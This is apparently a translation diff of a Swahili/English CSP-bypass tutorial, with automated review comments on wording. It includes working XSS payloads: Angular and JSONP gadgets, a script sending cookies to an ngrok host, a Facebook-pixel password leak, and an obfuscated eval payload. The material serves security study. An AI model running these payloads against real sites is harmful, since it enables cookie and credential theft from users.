Hata hivyo, kuna uwezekano mkubwa kwamba server inafanya **uthibitishaji wa faili zilizopakiwa** na itakuwezesha tu **kupakia aina maalum ya faili**.
However, it's highly probable that the server is **kukagua faili iliyopakiwa** and will only allow you to **kupakia aina maalum za faili**.
Zaidi ya hayo, hata kama unaweza kupakia **JS code inside** ndani ya faili ukitumia extension inayokubaliwa na server (k.m.: _script.png_) hilo haitoshi kwa sababu server zingine kama apache server **select MIME type of the file based on the extension** na browsers kama Chrome wata **reject to execute Javascript** code ndani ya kitu kinachotakiwa kuwa picha. "Hopefully", kuna makosa. Kwa mfano, kutoka CTF nilijifunza kwamba **Apache doesn't know** extension _**.wave**_, kwa hivyo haitoi nayo **MIME type like audio/***.
Moreover, even if you could upload a **JS code inside** a file using an extension accepted by the server (like: _script.png_) this won't be enough because some servers like apache server **select MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know** the _**.wave**_ extension, therefore it doesn't serve it with a **MIME type like audio/***.
Kutoka hapa, ikiwa utapata XSS na upload ya faili, na utafanikiwa kupata **misinterpreted extension**, unaweza kujaribu kupakia faili lenye extension hiyo pamoja na content ya script. Au, ikiwa server inakagua muundo sahihi wa faili iliyopakuliwa, tengeneza polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([mfano kadhaa za polyglot hapa](https://github.com/Polydet/polyglot-database)).
### Form-action
Ikiwa haiwezekani kuingiza JS, bado unaweza kujaribu exfiltrate kwa mfano credentials kwa **injecting a form action** (na labda kutegemea password managers kujaza nywila kiotomatiki). Unaweza kupata [**example in this report**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Pia, kumbuka kwamba `default-src` does not cover form actions.
If not possible to inject JS, you could still try to exfiltrate for example credentials **injecting a form action** (and maybe expecting password managers to auto-fill passwords). You can find an [**mfano katika ripoti hii**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp). Also, notice that `default-src` does not cover form actions.
### Third Party Endpoints + ('unsafe-eval')
> [!WARNING]
> Kwa baadhi ya payload zifuatazo, **`unsafe-eval` hata haihitajiki**.
> Kwa baadhi ya payload zifuatazo, **`unsafe-eval` haitahitajika hata**.
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Pakia toleo lenye udhaifu la angular na endesha JS yoyote:
Pakia toleo dhaifu la angular na utekeleze JS yoyote:
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
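Review bot: the paragraphs beginning "However, it's highly probable that the server is **kukagua faili iliyopakiwa** and will only allow you to **kupakia aina maalum za faili**." and "If not possible to inject JS, you could still try to exfiltrate ... [**mfano katika ripoti hii**]" are now English sentences with only the bold spans in Swahili: the commit re-Englished the surrounding prose but translated the emphasised fragments, which is a regression from the fully Swahili old lines ("Hata hivyo, kuna uwezekano mkubwa kwamba server inafanya **uthibitishaji wa faili zilizopakiwa** ..."). "Moreover, even if you could upload ..." and "From here, if you find a XSS ..." have the same shape, where the only Swahili left is "[mfano kadhaa za polyglot hapa]". Restore the Swahili paragraphs, or revert the bold spans with them. "Working payload:" likewise reverts "Payload inayofanya kazi:". The technical content is unaffected: the `/uploads/picture.png.js` payload, the `.wave` extension observation, the form-action note and the angular 1.4.6 `$eval` payload are unchanged.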
@ -198,10 +198,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### Payloads zinazotumia Angular + library yenye functions zinazorejesha `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
#### Payloads zinazotumia Angular + maktaba yenye functions zinazorejesha `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
> [!TIP]
> Makala inaonyesha kwamba unaweza **load** zote **libraries** kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), kutekeleza functions zote zilizoongezwa kutoka kila library, na kuangalia **functions gani kutoka libraries gani zinarejesha `window` object**.
> Chapisho linaonyesha kuwa unaweza **kupakia** zote **maktaba** kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), endesha functions zote zilizoongezwa kutoka kila maktaba, na hakiki **ni functions gani kutoka maktaba gani zinazorudisha `window` objekti**.
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
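Review bot: in the retranslated tip ("Chapisho linaonyesha kuwa unaweza **kupakia** zote **maktaba** ...") the modifier order is wrong for Swahili: the quantifier follows the noun, so it should be "**maktaba** zote"; and "`window` objekti" should be "`window` object", which is the wording the heading directly above uses ("zinazorejesha `window` object"). Suggested line: "> Chapisho linaonyesha kuwa unaweza **kupakia maktaba zote** kutoka `cdn.cloudflare.com` (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), kuendesha functions zote zilizoongezwa kutoka kila maktaba, na kuangalia **ni functions gani kutoka maktaba gani zinazorudisha `window` object**."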
@ -233,7 +233,7 @@ Angular XSS kutoka kwa jina la darasa:
```
#### Kutumia vibaya google recaptcha JS code
Kulingana na [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza JS code yoyote kupita kando ya CSP:
Kulingana na [**this CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves) unaweza kutumia vibaya [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza arbitrary JS code ukiepuka CSP:
```html
<div
ng-controller="CarouselController as c"
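Review bot: the only replaced line in this hunk swaps "kutekeleza JS code yoyote kupita kando ya CSP" for "kutekeleza arbitrary JS code ukiepuka CSP", reintroducing an English phrase that the previous version had already translated; "JS code yoyote" is correct Swahili and should stay ("... ili kutekeleza JS code yoyote ukiepuka CSP"). The link text "this CTF writeup" is left untranslated in both versions; decide once whether link texts are translated on this page and apply it consistently.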
@ -244,7 +244,7 @@ ng-init="c.init()"
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
Zaidi [**payloads kutoka kwenye writeup hii**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
Zaidi [**payloads from this writeup**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
```html
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
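Review bot: the replaced line turns the already-translated link text "payloads kutoka kwenye writeup hii" back into English ("payloads from this writeup"), which is the opposite direction from what a translation commit should move in; keep "Zaidi [**payloads kutoka kwenye writeup hii**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):". Nothing else in this hunk changes.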
@ -263,19 +263,19 @@ b.nonce=a.nonce; doc.body.appendChild(b)' />
```
#### Kutumia vibaya www.google.com kwa open redirect
URL ifuatayo inarudisha kwa example.com (kutoka [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
URL ifuatayo inaelekeza kwa example.com (from [here](https://www.landh.tech/blog/20240304-google-hack-50000/)):
```
https://www.google.com/amp/s/example.com/
```
Kutumia vibaya \*.google.com/script.google.com
Inawezekana kutumia vibaya Google Apps Script kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyofanywa katika [done in this report](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
Inawezekana kutumia vibaya Google Apps Script ili kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyofanywa katika [ripoti hii](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/).
### Endpoints za Wahusika wa Tatu + JSONP
### Endpoints za wahusika wa tatu + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
Mazingira kama haya ambapo `script-src` imewekwa kwa `self` na domain maalum iliyoorodheshwa inaweza kupitilizwa kwa kutumia JSONP. JSONP endpoints zinaruhusu njia za callback zisizo salama ambazo zinamruhusu mshambuliaji kufanya XSS, working payload:
Matukio kama haya ambapo `script-src` imewekwa kwa `self` na kikoa maalum kilicho kwenye orodha nyeupe kinaweza kupitishwa kwa kutumia JSONP. Endpoints za JSONP zinaruhusu njia za callback zisizo salama ambazo zinaweza kumruhusu mshambuliaji kutekeleza XSS, working payload:
```html
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
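Review bot: the retranslated JSONP paragraph ("Matukio kama haya ambapo `script-src` imewekwa kwa `self` na kikoa maalum kilicho kwenye orodha nyeupe kinaweza kupitishwa ...") has a subject agreement error: the subject is "Matukio" (plural), so the verb must be "yanaweza kupitishwa", not "kinaweza", which agrees with "kikoa". The same sentence ends "kutekeleza XSS, working payload:" with "working payload" left in English; "payload inayofanya kazi:" keeps the page consistent. Earlier in the hunk, "(kutoka [here](...))" was changed to "(from [here](...))", again un-translating a word that was already Swahili; "Kama ilivyofanywa katika [ripoti hii]" in the Apps Script paragraph is the right direction.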
@ -289,15 +289,15 @@ https://www.youtube.com/oembed?callback=alert;
```html
<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **ina endpoints za JSONP tayari kwa CSP bypass ya tovuti mbalimbali.**
[**JSONBee**](https://github.com/zigoo0/JSONBee) **ina ready-to-use JSONP endpoints kwa CSP bypass ya tovuti mbalimbali.**
Udhaifu huo huo utatokea ikiwa **trusted endpoint contains an Open Redirect** kwa sababu ikiwa initial endpoint ni trusted, redirects pia ni trusted.
Udhaifu uleule utatokea ikiwa **trusted endpoint contains an Open Redirect** kwa sababu ikiwa initial endpoint imethibitishwa, redirects zinachukuliwa kuwa za kuaminika.
### Matumizi Mabaya ya Wahusika wa Tatu
Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna domaini nyingi za pihak tatu ambazo zinaweza kuruhusiwa sehemu fulani ya CSP na zinaweza kutumiwa vibaya ili exfiltrate data au execute JavaScript code. Baadhi ya pihak tatu hizi ni:
Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna domain nyingi za third-party ambazo zinaweza kuruhusiwa mahali fulani katika CSP, na zinaweza kutumiwa vibaya ili exfiltrate data au execute JavaScript code. Baadhi ya third-parties ni:
| Shirika           | Domaini Zilizoruhusiwa                        | Uwezo       |
| Chombo            | Domain Zinaruhusiwa                          | Uwezo       |
| ----------------- | -------------------------------------------- | ----------- |
| Facebook          | www.facebook.com, \*.facebook.com            | Exfil       |
| Hotjar            | \*.hotjar.com, ask.hotjar.io                 | Exfil       |
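Review bot: the new table header replaces "Shirika" (organisation) with "Chombo" (tool/vessel) and "Domaini Zilizoruhusiwa" with "Domain Zinaruhusiwa"; the rows list companies (Facebook, Hotjar, Salesforce Heroku, Google Firebase), so "Shirika" was the right word, and "Zilizoruhusiwa" is the correct relative form for "allowed/whitelisted". Suggested header: "| Shirika | Domain Zilizoruhusiwa | Uwezo |". Separately, the JSONBee line now reads "ina ready-to-use JSONP endpoints", reverting the translated "ina endpoints za JSONP tayari". The replacement of "pihak tatu" (not a Swahili word) with "third-party" in the sensepost paragraph is a good fix.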
@ -308,7 +308,7 @@ Kama ilivyoelezwa katika [following post](https://sensepost.com/blog/2023/dress-
| Salesforce Heroku | \*.herokuapp.com                             | Exfil, Exec |
| Google Firebase   | \*.firebaseapp.com                           | Exfil, Exec |
Ikiwa utapata moja ya domaini zilizoruhusiwa katika CSP ya target yako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye huduma ya pihak tatu na, ama exfiltrate data kwa huduma hiyo au execute code.
Ikiwa utapata yoyote ya domain zilizo ruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye third-party service na, ama exfiltrate data kwa huduma hiyo au execute code.
Kwa mfano, ikiwa utapata CSP ifuatayo:
```
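Review bot: "zilizo ruhusiwa" in "Ikiwa utapata yoyote ya domain zilizo ruhusiwa katika CSP ya lengo lako" must be written as one word, "zilizoruhusiwa" (the relative prefix attaches to the verb), and "moja ya domain" reads better than "yoyote ya domain" for "one of the domains". Suggested: "Ikiwa utapata moja ya domain zilizoruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye third-party service na, ama exfiltrate data kwa huduma hiyo au execute code." The replacement of "huduma ya pihak tatu" with "third-party service" is correct.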
@ -318,80 +318,80 @@ au
```
Content-Security-Policy: connect-src www.facebook.com;
```
Unapaswa kuweza exfiltrate data, kwa namna ile ile kama imekuwa ikifanywa na [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, fuata hatua hizi za jumla:
Unapaswa kuwa na uwezo wa exfiltrate data, similarly as it has always be done with [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, fuata hatua hizi za jumla:
1. Unda akaunti ya Facebook Developer hapa.
2. Tengeneza app mpya ya "Facebook Login" na chagua "Website".
3. Nenda kwenye "Settings -> Basic" na upate "App ID" yako.
4. Kwenye tovuti lengwa unayotaka exfiltrate data kutoka, unaweza exfiltrate data kwa kutumia moja kwa moja Facebook SDK gadget "fbq" kupitia "customEvent" na data payload.
5. Nenda kwenye App yako "Event Manager" na chagua application uliyotengeneza (note the event manager could be found in an URL similar to this: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. Chagua tab "Test Events" kuona events zinazotumwa na "your" web site.
1. Create a Facebook Developer account hapa.
2. Create a new "Facebook Login" app and select "Website".
3. Nenda kwenye "Settings -> Basic" na pata "App ID" yako
4. Kwenye target site unayotaka ku-exfiltrate data kutoka, unaweza exfiltrate data kwa kutumia moja kwa moja Facebook SDK gadget "fbq" kupitia "customEvent" na data payload.
5. Nenda kwenye App yako "Event Manager" na chagua application uliyotengeneza (kumbuka event manager inaweza kupatikana katika URL inayofanana na hii: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. Chagua tab "Test Events" ili kuona events zinazotumwa na "your" web site.
Kisha, kwa upande wa victim, utekeleze code ifuatayo ili kuanzisha Facebook tracking pixel kuelekeza kwenye attacker's Facebook developer account app-id na kutoa custom event kama ifuatavyo:
Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
```JavaScript
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
Kuhusu domain nyingine saba za third-party zilizotajwa kwenye jedwali hapo awali, kuna njia nyingi zaidi za kuzitumia vibaya. Rejea alipokuwa [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) kwa maelezo ya ziada kuhusu matumizi mabaya mengine ya third-party.
Kuhusu yale mengine saba third-party domains yaliyotajwa katika jedwali lililopita, kuna njia nyingi zaidi unazoweza kuzitumia vibaya. Refer to the previously [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) for additional explanations about other third-party abuses.
### Kupitia RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
### Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
Mbali na ule uelekezaji uliotajwa hapo juu wa kupitisha vikwazo vya path, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) inayoweza kutumika kwenye servers fulani.
Mbali na redirection iliyotajwa hapo juu ili bypass path restrictions, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) ambayo inaweza kutumika kwenye servers fulani.
Kwa mfano, ikiwa CSP inaruhusu path `https://example.com/scripts/react/`, inaweza kupitishwa kama ifuatavyo:
Kwa mfano, kama CSP inaruhusu path `https://example.com/scripts/react/`, inaweza kupitishwa kama ifuatavyo:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
Kivinjari hatimaye kitapakia `https://example.com/scripts/angular/angular.js`.
The browser will ultimately load `https://example.com/scripts/angular/angular.js`.
Hii inafanya kazi kwa sababu kwa upande wa kivinjari, unapakia faili iliyoitwa `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.
Hii inafanya kazi kwa sababu kwa upande wa kivinjari, unapakia faili yenye jina `..%2fangular%2fangular.js` iliyo chini ya `https://example.com/scripts/react/`, ambayo inakubaliana na CSP.
∑, zitatafsiri, na kwa ufanisi zitafanya ombi la `https://example.com/scripts/react/../angular/angular.js`, ambalo ni sawa na `https://example.com/scripts/angular/angular.js`.
∑, kivinjari kitabadilisha msimbo huo (decode), na kwa hivyo kitaomba `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.
Kwa **kuita faida ukosefu huu wa muafaka katika tafsiri ya URL kati ya kivinjari na server, kanuni za path zinaweza kuepukwa**.
Kwa **kuitumia utofauti huu wa tafsiri ya URL kati ya kivinjari na server, kanuni za path zinaweza kupitilizwa**.
Suluhisho ni kutotumia `%2f` kama `/` upande wa server, kuhakikisha tafsiri sawa kati ya kivinjari na server ili kuepuka tatizo hili.
Suluhisho ni kutofanya `%2f` kama `/` upande wa server, kuhakikisha tafsiri ndogo kati ya kivinjari na server ili kuepuka tatizo hili.
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
### Utekelezaji wa JS katika Iframes
### Utekelezaji wa JS kwenye Iframes
{{#ref}}
../xss-cross-site-scripting/iframes-in-xss-and-csp.md
{{#endref}}
### **base-uri** inakosekana
### Kukosa **base-uri**
Ikiwa diretivu ya **base-uri** inakosekana unaweza kuitumia vibaya kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).
Kama directive ya **base-uri** haipo unaweza kuitumia vibaya kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).
Zaidi ya hayo, ikiwa **ukurasa unapakia script kwa kutumia relative path** (like `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kutumia vibaya **base** **tag** ili kuifanya **load** script kutoka **server yako mwenyewe ukifanikisha XSS.**\
Kama ukurasa unaoathirika unapakiwa kwa **httpS**, tumia URL ya **httpS** katika base.
Zaidi ya hayo, ikiwa **ukurasa unapakia script kwa kutumia relative path** (kama `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kuitumia vibaya **base** **tag** ili kuifanya i**load** script kutoka **seva yako mwenyewe kufanikisha XSS.**\
Ikiwa ukurasa wenye udhaifu unapakiwa kwa **httpS**, tumia URL ya httpS katika base.
```html
<base href="https://www.attacker.com/" />
```
### Matukio ya AngularJS
### AngularJS matukio
Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuweka vizingiti kwa matukio ya JavaScript. Hata hivyo, AngularJS inatoa matukio maalum kama mbadala. Ndani ya tukio, AngularJS hutoa object ya kipekee `$event`, inayorejea kwenye native browser event object. Object `$event` inaweza kutumiwa kuzunguka CSP. Kwa mfano, katika Chrome, object `$event/event` ina sifa `path`, inayoshikilia array ya object zilizohusika katika mnyororo wa utekelezaji wa tukio, na object `window` mara zote ikipangwa mwisho. Muundo huu ni muhimu kwa mbinu za kutoroka sandbox.
Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuzuia matukio ya JavaScript. Hata hivyo, AngularJS inaleta matukio maalum kama mbadala. Katika tukio, AngularJS hutoa kipengele cha kipekee `$event`, kinachorejea kwenye native browser event object. Kipengele hiki `$event` kinaweza kutumiwa kuzunguka CSP. Kwa mfano, kwenye Chrome, kitu `$event/event` kina sifa `path`, inayoshikilia array ya objects inayohusika katika mnyororo wa utekelezaji wa tukio, ambapo `window` daima iko mwishoni. Muundo huu ni muhimu kwa sandbox escape tactics.
Kwa kupeleka array hii kwenye filter ya `orderBy`, inawezekana kuzunguka juu yake, ukaitegemea element ya mwisho (object `window`) kutekeleza global function kama `alert()`. Snippet ya code iliyooneshwa hapa chini inaelezea mchakato huu:
Kwa kuielekeza array hii kwenye filter ya `orderBy`, inawezekana kuitereta juu yake, ukitumia kipengele cha mwisho (kitu `window`) kuanzisha global function kama `alert()`. Snippet ya code iliyoonyeshwa hapa chini inaelezea mchakato huu:
```xml
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
Kiibukizo hiki kinaonyesha matumizi ya directive ya `ng-focus` kusababisha tukio, kutumia `$event.path|orderBy` kuendesha array ya `path`, na kutumia object ya `window` kutekeleza `alert()` na hivyo kufichua `document.cookie`.
Kipande hiki kinaangazia matumizi ya directive ya `ng-focus` kuzusha tukio, ikitumia `$event.path|orderBy` kurekebisha array ya `path`, na kutumia object ya `window` kutekeleza `alert()` na hivyo kufichua `document.cookie`.
**Tafuta Angular bypasses nyingine kwenye** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
**Pata bypasses nyingine za Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
### AngularJS na whitelisted domain
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
Sera ya CSP ambayo inaweka whitelist ya domains kwa ajili ya script loading katika application ya Angular JS inaweza kupitishwa kwa uitoaji wa callback functions na baadhi ya vulnerable classes. Taarifa zaidi kuhusu mbinu hii zinaweza kupatikana katika mwongozo wa kina uliopo kwenye [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).
Sera ya CSP inayoorodhesha domains kwa ajili ya upakiaji wa script katika application ya Angular JS inaweza kupitishwa kupitia kuamshwa kwa callback functions na baadhi ya classes zilizo na udhaifu. Maelezo zaidi juu ya mbinu hii yanaweza kupatikana katika mwongozo wa kina uliopo kwenye [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).
Payloads zinazofanya kazi:
Working payloads:
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
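Review bot: "kuhakikisha tafsiri ndogo kati ya kivinjari na server" in the RPO mitigation paragraph is a meaning error: "ndogo" means "small/minor", while the sentence is about a consistent interpretation of the URL, which the replaced line had right ("tafsiri sawa"); keep "Suluhisho ni kutotumia `%2f` kama `/` upande wa server, kuhakikisha tafsiri sawa kati ya kivinjari na server ili kuepuka tatizo hili." Two more regressions in the same hunk: the heading "### AngularJS matukio" has the wrong word order (keep "### Matukio ya AngularJS"), and "inawezekana kuitereta juu yake" uses a non-word for "iterate" (keep "kuzunguka juu yake" or use "kupitia vipengele vyake"). Several paragraphs are replaced with English rather than Swahili ("similarly as it has always be done with", "Then, on the victim side, you execute the following code ...", "Refer to the previously [blog post]", "### Bypass via RPO", "The browser will ultimately load", "Working payloads:"), and two of those English sentences are themselves ungrammatical ("has always be done", "Refer to the previously"). Finally, both versions of the "∑, kivinjari kitabadilisha msimbo huo" sentence start with a stray "∑," that is an encoding artefact rather than a word, step 5 of the Facebook procedure never closes its parenthesis after "test\_events", "hapa" in step 1 has no link behind it, and the sensepost URL "dress-codethe-talk" differs from "dress-code-the-talk" used above the table.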
@ -399,13 +399,13 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Endpoints nyingine za JSONP za arbitrary execution zinaweza kupatikana [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao zilifutwa au kurekebishwa)
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao zilitoweka au zilirekebishwa)
### Kupita kupitia Uelekezaji
### Bypass via Redirection
Nini kinatokea wakati CSP inakutana na uelekezaji upande wa seva? Ikiwa uelekezaji unasababisha origin tofauti ambayo haijaruhusiwa, bado itashindwa.
Nini hutokea wakati CSP inakutana na urejeeshaji upande wa server? Ikiwa urejeeshaji unaelekeza kwa origin tofauti ambayo haijaruhusiwa, bado utashindwa.
Hata hivyo, kwa mujibu wa maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekezaji unasababisha njia tofauti, unaweza kupitisha vikwazo vya asili.
Hata hivyo, kwa mujibu wa maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa urejeeshaji unaelekeza kwa njia tofauti, unaweza kupitisha vikwazo vya awali.
Hapa kuna mfano:
```html
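Review bot: "urejeeshaji" in the retranslated redirection paragraph ("Nini hutokea wakati CSP inakutana na urejeeshaji upande wa server?") means "returning/restoring", not "redirection"; the previous "uelekezaji" (or "uelekezaji upya") is the right term and should be kept in both sentences of that paragraph and in the next one ("ikiwa urejeeshaji unaelekeza kwa njia tofauti"). The heading "### Bypass via Redirection" and the line "Other JSONP arbitrary execution endpoints can be found in [**here**]" replace Swahili with English (and "found in here" is not idiomatic English either); keep "### Kupita kupitia Uelekezaji" and "Endpoints nyingine za JSONP za arbitrary execution zinaweza kupatikana [**hapa**](...)".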
@ -425,38 +425,38 @@ content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
</body>
</html>
```
If CSP is set to `https://www.google.com/a/b/c/d`, since the path is considered, both `/test` and `/a/test` scripts will be blocked by CSP.
Ikiwa CSP imewekwa kwa `https://www.google.com/a/b/c/d`, kwa kuwa path inazingatiwa, scripts `/test` na `/a/test` zitazuiwa na CSP.
However, the final `http://localhost:5555/301` will be **redirected on the server-side to `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Since it is a redirection, the **path is not considered**, and the **script can be loaded**, thus bypassing the path restriction.
Hata hivyo, `http://localhost:5555/301` ita **pelekwa upande wa server hadi `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni redirection, **path haizingatiwi**, na **script inaweza kupakiwa**, hivyo kupitisha kikomo la path.
With this redirection, even if the path is specified completely, it will still be bypassed.
Kwa redirection hii, hata kama path imeelezewa kikamilifu, bado itapitishwa.
Therefore, the best solution is to ensure that the website does not have any open redirect vulnerabilities and that there are no domains that can be exploited in the CSP rules.
Kwa hiyo, suluhisho bora ni kuhakikisha kwamba tovuti haina open redirect vulnerabilities na kwamba hakuna domains zinazoweza kutumika vibaya katika sheria za CSP.
### Bypass CSP with dangling markup
### Bypass CSP kwa dangling markup
Soma [hapa](../dangling-markup-html-scriptless-injection/index.html).
Soma [jinsi hapa](../dangling-markup-html-scriptless-injection/index.html).
### 'unsafe-inline'; img-src \*; via XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` inamaanisha kwamba unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` inamaanisha kwamba unaweza kutumia kwenye webpage picha yoyote kutoka kwa rasilimali yoyote.
